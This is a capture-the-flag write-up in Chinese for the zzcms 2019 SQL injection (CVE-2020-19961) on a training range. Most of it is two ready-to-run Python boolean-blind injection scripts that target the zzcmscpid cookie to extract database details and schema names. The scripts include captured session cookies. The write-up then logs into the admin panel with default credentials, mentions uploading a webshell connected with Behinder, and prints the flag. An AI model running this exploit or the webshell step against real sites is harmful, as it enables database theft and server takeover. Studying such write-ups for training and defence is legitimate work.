春秋云镜 CVE-2020-19961 zz cms 2019 存在sql注入漏洞
靶标介绍
zz cms 2019 的 subzs.php 存在 SQL 注入漏洞。注意：下面的 exp 实际请求的是 /zs/zs_list.php，注入点是 Cookie 中的 zzcmscpid 字段。
启动场景
漏洞利用
admin/admin登录会员中心后台成功
大佬的布尔盲注 exp（需先以会员身份登录，并把脚本里 Cookie 中的 PHPSESSID / UserName / PassWord 换成自己的会话值；脚本通过响应中是否出现特定字符串判断注入条件真假）
#coding: utf-8
import requests
import string
# Request URL template; ``{}`` is substituted with host[:port] by Sqli().
url = "http://{}/zs/zs_list.php"

# Base request headers.  ``Host`` and ``Cookie`` are ``{}`` templates that the
# __main__ block fills in; the remaining values mimic a Firefox 68 browser and
# may need adjusting to the target environment.
_USER_AGENT = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:68.0) Gecko/20100101 Firefox/68.0"
_ACCEPT = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
_ACCEPT_LANGUAGE = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
headers = {
    "Host": "{}",
    "User-Agent": _USER_AGENT,
    "Accept": _ACCEPT,
    "Accept-Language": _ACCEPT_LANGUAGE,
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Connection": "keep-alive",
    "Cookie": "{}",
}
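def Sqli(host, sql, *, marker="onload='resizeimg(60,60,this)'", timeout=10):
    """Recover the result of *sql* one character at a time via boolean-based blind injection.

    The injection point is the ``zzcmscpid`` cookie sent to ``/zs/zs_list.php``.  For each
    position and each candidate in ``string.printable`` the request carries
    ``zzcmscpid=0,(if(((ascii(substr((<sql>),<pos>,1)))=<code>),1,0)))#`` with spaces
    rewritten as ``/**/``; the presence of *marker* in the response body is taken as
    "condition true".  The unmatched ``)`` and trailing ``#`` are presumably there to close
    the application's own parenthesised expression and comment out the rest of its query
    (NOTE(review): confirm against the zzcms source).  Position advances until no candidate
    matches, which is treated as the end of the result.

    Args:
        host: ``host[:port]`` substituted into the module-level ``url`` template.
        sql: a SELECT expression yielding one string (e.g. ``select user()``).
        marker: substring whose presence in the response means the injected condition
            was true; adjust to the target page.  The published listing spelled
            ``onload`` with Greek omicrons (U+03BF) — a common blog-platform artifact
            that would never match real HTML — so the default uses plain Latin letters.
        timeout: per-request timeout in seconds, so a stalled target raises instead of
            hanging the loop forever.

    Returns:
        None.  The recovered prefix is printed after every matched character and
        ``完成`` when no further character matches.  Note that a wrong *marker* or an
        error page also yields ``完成`` after zero characters, so an empty result means
        "true/false could not be distinguished", not necessarily an empty query result.

    Side effects:
        Rebinds the module-level ``url`` to its host-substituted form (kept from the
        original); one GET is sent per candidate character per position.  The shared
        ``headers`` dict is no longer mutated — a per-request copy is built instead.
    """
    global url
    url = url.format(host)

    condition_tpl = "ascii(substr(({}),{},1)))={}"
    payload_tpl = "0,(if((({}),1,0)))#"

    recovered = ""
    position = 1
    with requests.session() as session:
        while True:
            before = recovered
            for candidate in string.printable:
                condition = condition_tpl.format(sql, position, ord(candidate))
                payload = payload_tpl.format(condition).replace(" ", "/**/")
                # Per-request header copy: avoids the mutate-then-restore dance on the
                # shared dict, which would leave a stale cookie behind on an exception.
                req_headers = dict(headers)
                req_headers["Cookie"] = headers["Cookie"] + "; zzcmscpid=" + payload
                resp = session.get(url, headers=req_headers, timeout=timeout)
                if marker in resp.text:
                    recovered += candidate
                    print(recovered)
                    break
            position += 1
            if before == recovered:
                # No printable character matched at this position: end of result.
                print("完成")
                return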
if __name__ == "__main__":
    # Target host[:port]; substituted into both the URL and the Host header.
    host = "127.0.0.1:9000"
    # Session of a logged-in member account.  PassWord is a 32-hex digest,
    # presumably the md5 of the password as the application stores it in the
    # cookie — replace all three values with your own session before running.
    user_cookie = "PHPSESSID=89m7nn9g388n5il12dde5cb9kp; UserName=test; PassWord=343b1c4a3ea721b2d640fc8700db0f36"
    # Expression to extract; group_concat() collapses it to a single string.
    sql = "select group_concat(user(),version(),@@version_compile_os)"
    headers.update(
        Host=headers["Host"].format(host),
        Cookie=headers["Cookie"].format(user_cookie),
    )
    Sqli(host, sql)
获取所有数据库：只需把 sql 换成查询 information_schema.SCHEMATA 的语句，其余代码与上面完全相同
#coding: utf-8
import requests
import string
# Request URL template; ``{}`` is substituted with host[:port] by Sqli().
url = "http://{}/zs/zs_list.php"

# Base request headers.  Unlike the template form, Host and Cookie here are a
# captured literal session for the CTF target: PHPSESSID plus UserName/PassWord
# (a 32-hex digest, presumably md5).  They contain no ``{}`` placeholder, so any
# later ``.format()`` on them is a no-op — edit the literals directly, and expect
# the PHPSESSID to expire.
_HOST = "eci-2ze91hjzahykfmrparko.cloudeci1.ichunqiu.com"
_USER_AGENT = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:68.0) Gecko/20100101 Firefox/68.0"
_ACCEPT = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
_ACCEPT_LANGUAGE = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
_COOKIE = (
    "Hm_lvt_2d0601bd28de7d49818249cf35d95943=1690683412,1690958420,1691372705,1691455849; "
    "Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1691473990; "
    "__51cke__=; "
    "__tins__713776=%7B%22sid%22%3A%201691474062770%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201691475864605%7D; "
    "__51laig__=2; "
    "PHPSESSID=sbeiij1sjc0a2t4lpaql0jl1l3; "
    "UserName=admin; "
    "PassWord=21232f297a57a5a743894a0e4a801fc3"
)
headers = {
    "Host": _HOST,
    "User-Agent": _USER_AGENT,
    "Accept": _ACCEPT,
    "Accept-Language": _ACCEPT_LANGUAGE,
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Connection": "keep-alive",
    "Cookie": _COOKIE,
}
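def Sqli(host, sql, *, marker="onload='resizeimg(60,60,this)'", timeout=10):
    """Recover the result of *sql* one character at a time via boolean-based blind injection.

    The injection point is the ``zzcmscpid`` cookie sent to ``/zs/zs_list.php``.  For each
    position and each candidate in ``string.printable`` the request carries
    ``zzcmscpid=0,(if(((ascii(substr((<sql>),<pos>,1)))=<code>),1,0)))#`` with spaces
    rewritten as ``/**/``; the presence of *marker* in the response body is taken as
    "condition true".  The unmatched ``)`` and trailing ``#`` are presumably there to close
    the application's own parenthesised expression and comment out the rest of its query
    (NOTE(review): confirm against the zzcms source).  Position advances until no candidate
    matches, which is treated as the end of the result.

    Args:
        host: ``host[:port]`` substituted into the module-level ``url`` template.
        sql: a SELECT expression yielding one string (e.g. ``select user()``).
        marker: substring whose presence in the response means the injected condition
            was true; adjust to the target page.  The published listing spelled
            ``onload`` with Greek omicrons (U+03BF) — a common blog-platform artifact
            that would never match real HTML — so the default uses plain Latin letters.
        timeout: per-request timeout in seconds, so a stalled target raises instead of
            hanging the loop forever.

    Returns:
        None.  The recovered prefix is printed after every matched character and
        ``完成`` when no further character matches.  Note that a wrong *marker* or an
        error page also yields ``完成`` after zero characters, so an empty result means
        "true/false could not be distinguished", not necessarily an empty query result.

    Side effects:
        Rebinds the module-level ``url`` to its host-substituted form (kept from the
        original); one GET is sent per candidate character per position.  The shared
        ``headers`` dict is no longer mutated — a per-request copy is built instead.
    """
    global url
    url = url.format(host)

    condition_tpl = "ascii(substr(({}),{},1)))={}"
    payload_tpl = "0,(if((({}),1,0)))#"

    recovered = ""
    position = 1
    with requests.session() as session:
        while True:
            before = recovered
            for candidate in string.printable:
                condition = condition_tpl.format(sql, position, ord(candidate))
                payload = payload_tpl.format(condition).replace(" ", "/**/")
                # Per-request header copy: avoids the mutate-then-restore dance on the
                # shared dict, which would leave a stale cookie behind on an exception.
                req_headers = dict(headers)
                req_headers["Cookie"] = headers["Cookie"] + "; zzcmscpid=" + payload
                resp = session.get(url, headers=req_headers, timeout=timeout)
                if marker in resp.text:
                    recovered += candidate
                    print(recovered)
                    break
            position += 1
            if before == recovered:
                # No printable character matched at this position: end of result.
                print("完成")
                return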
if __name__ == "__main__":
    # Target host[:port]; identical to the literal Host header defined above.
    host = "eci-2ze91hjzahykfmrparko.cloudeci1.ichunqiu.com"
    # NOTE(review): in this listing the module-level Cookie header is a literal
    # capture with no ``{}`` placeholder, so the ``.format(user_cookie)`` below
    # substitutes nothing and the module-level cookie (UserName=admin) is what
    # is actually sent; ``user_cookie`` here is effectively dead.  The same holds
    # for Host, whose literal already equals ``host``.
    user_cookie = "PHPSESSID=sbeiij1sjc0a2t4lpaql0jl1l3; UserName=test; PassWord=21232f297a57a5a743894a0e4a801fc3"
    # Enumerate every schema name; the outer group_concat(...,2,3) collapses the
    # nested result into the single string the blind-injection loop expects.
    sql = "select group_concat((select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA),2,3)"
    headers.update(
        Host=headers["Host"].format(host),
        Cookie=headers["Cookie"].format(user_cookie),
    )
    Sqli(host, sql)
数据库中未找到 flag，尝试通过后台上传文件获取 flag
访问 /admin 路径
进入管理界面
admin/admin登录管理后台成功
上传 webshell 后用冰蝎连接（上传文件的具体步骤原文未展示）
得到flag
flag{efgeca1b-e165-4a67-95c9-caceea1a4770}